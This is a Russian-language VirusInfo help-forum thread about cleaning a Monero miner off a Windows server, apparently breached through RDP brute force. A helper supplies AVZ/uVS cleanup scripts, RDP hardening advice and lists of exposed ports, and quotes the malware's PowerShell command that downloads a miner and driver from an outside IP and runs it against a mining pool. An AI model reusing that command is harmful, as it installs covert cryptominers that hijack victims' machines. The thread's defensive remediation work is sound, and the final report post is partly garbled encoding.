Показано с 1 по 14 из 14.

Торможение системы [VHO:Trojan.Win32.Miner.gen] (заявка № 226454)

  1. #1
    Junior Member Репутация
    Регистрация
    21.01.2015
    Сообщений
    6
    Вес репутации
    23

    Торможение системы [VHO:Trojan.Win32.Miner.gen]

    Здравствуйте. Очень плохо работает система. Почти каждая программа работает с торможением.
    В диспетчере задач процесс COM Surrogate грузит процессор на 95%.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,301
    Вес репутации
    363
    Уважаемый(ая) W1nd, спасибо за обращение на наш форум!

    Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    32,527
    Вес репутации
    982
    Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:
    Код:
    begin
     TerminateProcessByName('c:\windows\temp\log.txt.exe');
     QuarantineFile('C:\Windows\system32\network.exe', '');
     QuarantineFile('c:\windows\temp\log.txt.exe', '');
     DeleteFile('c:\windows\temp\log.txt.exe', '');
     DeleteFile('c:\windows\temp\log.txt.exe', '64');
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 2, 2, true);
    end.
    Пожалуйста, перезагрузите сервер вручную.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    21.01.2015
    Сообщений
    6
    Вес репутации
    23
    Здравствуйте, карантин выслал, лог прикрепляю.
    Вложения Вложения

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    32,527
    Вес репутации
    982
    Майнер работает, но в автозагрузке его нет, запускается, похоже, вручную:
    Код:
    cmd.exe /C powershell.exe -C (New-Object System.Net.WebClient).DownloadFile('http://125.212.214.148:666/wao.exe','C:\windows\teMp\System.exe');(New-Object Net.WebClient).DownloadFile('http://125.212.214.148:666/WinRing0x64.sys', 'C:\Windows\temp\WinRing0x64.sys') && C:\Windows\temp\System.exe --donate-level 1 -o europe.randomx-hub.miningpoolhub.com:20580 -u hiddensec070.ww -a rx/0 --coin monero -B -l C:\ProgramData\log.txt && del C:\Windows\temp\System.exe
    Запускается от системы, удалять его можно, но проблему это не решит.

    Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):
    Код:
    ;uVS v4.11.3 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv10.0
    v400c
    OFFSGNSAVE
    ; C:\WINDOWS\TEMP\SYSTEM.EXE
    rbl 569FCF95F3889CEFD87C1B425FA37B03
    dirzooex %SystemRoot%\TEMP
    zoo %SystemRoot%\TEMP\SYSTEM.EXE
    addsgn A1BA20CF1DE779676D3051F9E97612258E75B47B0E62AC13853CF57B50E658BD23479466E5645401A84D7B77161649FA7C049C70A6193B3265F44AD3D6DDA865 8 Tool.BtcMine.2492 [DrWeb] 7
    
    chklst
    delvir
    
    deltmp
    czoo
    Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.

    В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

    Скорее всего, взломали по RDP.

    Смените всем пользователям, у кого есть права входа по RDP, пароли, установите сложные.
    Уберитеправа администратора у всех пользователей, кому они действительно не необходимы, при грамотной настройке прав всем они не нужны.
    Учёткам Администратор/Administrator/Admin запретить удалённый доступ, для администрирования через терминал пользуйтесь другими, с
    нетипичным, лучше не словарным (типа rdp1) именем и сложными паролями.
    Включить защиту от буртфорса (подбора) паролей. Простейший вариант - через политики, блокировать учётку на N минут после 3-4 неудачных попыток входа. Есть более продвинутые варианты с использованием стороннего софта, например: Инструкция по защите RDP подключения, или возможностей маршрутизатора, для Mikrotik, в частности, есть множество изощрённых рецептов.

    И зачем открыты множество портов наружу, включая 53-й, у вас сервер DNS на весь интернет раздаёт? ЗаDDOSят.

    Эти так вообще только для хитрого взлома пригодятся:
    88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-01 11:30:01Z)
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds?
    464/tcp open kpasswd5?
    593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
    3268/tcp open ldap
    3269/tcp open tcpwrapped
    9389/tcp open mc-nmf .NET Message Framing
    49668/tcp open msrpc Microsoft Windows RPC
    49675/tcp open msrpc Microsoft Windows RPC
    49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
    49681/tcp open msrpc Microsoft Windows RPC
    49703/tcp open msrpc Microsoft Windows RPC
    49744/tcp open msrpc Microsoft Windows RPC
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    21.01.2015
    Сообщений
    6
    Вес репутации
    23
    Добрый день. Карантин выслал, лог прикрепляю.
    Данную проблему решит только переустановка системы?
    Вложения Вложения

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    32,527
    Вес репутации
    982
    Вы меня либо не поняли, либо не читали рекомендации вообще. Переустановите систему, не не приняв мер против взлома - получите майнер снова через какое-то время.

    Выполните скрипт в UVS:
    Код:
    ;uVS v4.11.4 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv10.0
    v400c
    OFFSGNSAVE
    dirzooex %SystemRoot%\TEMP
    adddir zoo %SystemRoot%\TEMP
    zoo %SystemRoot%\TEMP\SYSTEM.EXE
    addsgn A1BA20CF1DE779676D3051F9E97612258E75B47B0E62AC13853CF57B50E658BD23479466E5645401A84D7B77161649FA7C049C70A6193B3265F44AD3D6DDA865 8 Tool.BtcMine.2492 [DrWeb] 7
    
    chklst
    delvir
    
    regt 27
    czoo
    
    cexec wevtutil.exe epl System system.evtx
    cexec wevtutil.exe epl Application Application.evtx
    cexec wevtutil.exe epl Security Security.evtx
    cexec pack\7za.exe a -t7z -sdel -mx9 -m0=lzma:lp=1:lc=0:d=64m Events.7z *.evtx
    apply
    В папке с uVS появится новый архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

    В папке с UVS появится архив Events.7z, загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    21.01.2015
    Сообщений
    6
    Вес репутации
    23
    Добрый день.
    Ссылка на файл https://my-files.su/ib64on
    Карантин выслал и лог прикрепляю
    Вложения Вложения

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    32,527
    Вес репутации
    982
    Пока всё по-прежнему, брутфориить по RDP можно до посинения. Смена порта ничего не даёт.
    Настройте блокировку через болитики, или IPBan.

    Скачайте по той же ссылке обновлённую версию UVS и сделайте новый полный образ автозапуска.
    WBR,
    Vadim

  11. #10
    Junior Member Репутация
    Регистрация
    21.01.2015
    Сообщений
    6
    Вес репутации
    23
    Здравствуйте, ссылка на лог https://my-files.su/dn5cim

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    32,527
    Вес репутации
    982
    Майнера нет.

    Но RDP всё так же подвержен брутфорсу. IPBan отсутствует, насколько вижу.
    Кстати в той инструкции ссылка на устаревшую версию и x86. Ставьте свежую x64 версию.
    WBR,
    Vadim

  13. #12
    Junior Member Репутация
    Регистрация
    21.01.2015
    Сообщений
    6
    Вес репутации
    23
    Свежую версию ipban поставил, все сделал согласно инструкции.

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    32,527
    Вес репутации
    982
    Теперь банит.

    Только один вопрос остался: зачем всё это торчит наружу?
    53/tcp open domain Simple DNS Plus
    88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-16 17:15:34Z)
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds?
    464/tcp open kpasswd5?
    593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
    636/tcp open tcpwrapped
    3268/tcp open ldap
    3269/tcp open tcpwrapped
    9389/tcp open mc-nmf .NET Message Framing
    49667/tcp open msrpc Microsoft Windows RPC
    49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
    49675/tcp open msrpc Microsoft Windows RPC
    49678/tcp open msrpc Microsoft Windows RPC
    49702/tcp open msrpc Microsoft Windows RPC
    49910/tcp open msrpc Microsoft Windows RPC
    WBR,
    Vadim

  15. #14
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,232
    Вес репутации
    966

    =C8=F2=EE=E3 =EB=E5=F7=E5=ED=E8=FF

    =D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
    =E5=F7=E5=ED=E8=FF:
    • =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 3
    • =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 8
    • =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
      =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
      1. c:\windows\system32\network.exe - VHO:Trojan.Win32.Miner.gen=
      2. c:\windows\temp\log.txt.exe - VHO:Trojan.Win32.Miner.gen=
      3. \system.exe._74948333fd5cced7e04dc67e68096b6437160 2a9 - VHO:Tr=
        ojan.Win32.Miner.gen

  • Уважаемый(ая) W1nd, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. сильное \"торможение\" системы (заявка №25375)
      От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
      Ответов: 2
      Последнее сообщение: 17.07.2010, 10:59
    2. Торможение системы
      От Jook в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 10.12.2009, 14:04
    3. Непонятное торможение системы
      От Ovak в разделе Помогите!
      Ответов: 3
      Последнее сообщение: 16.09.2008, 08:59
    4. Торможение системы
      От Serhio_love в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 22.08.2007, 23:41
    5. Периодическое торможение системы
      От albertmur в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 24.02.2007, 06:48

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00609 seconds with 17 queries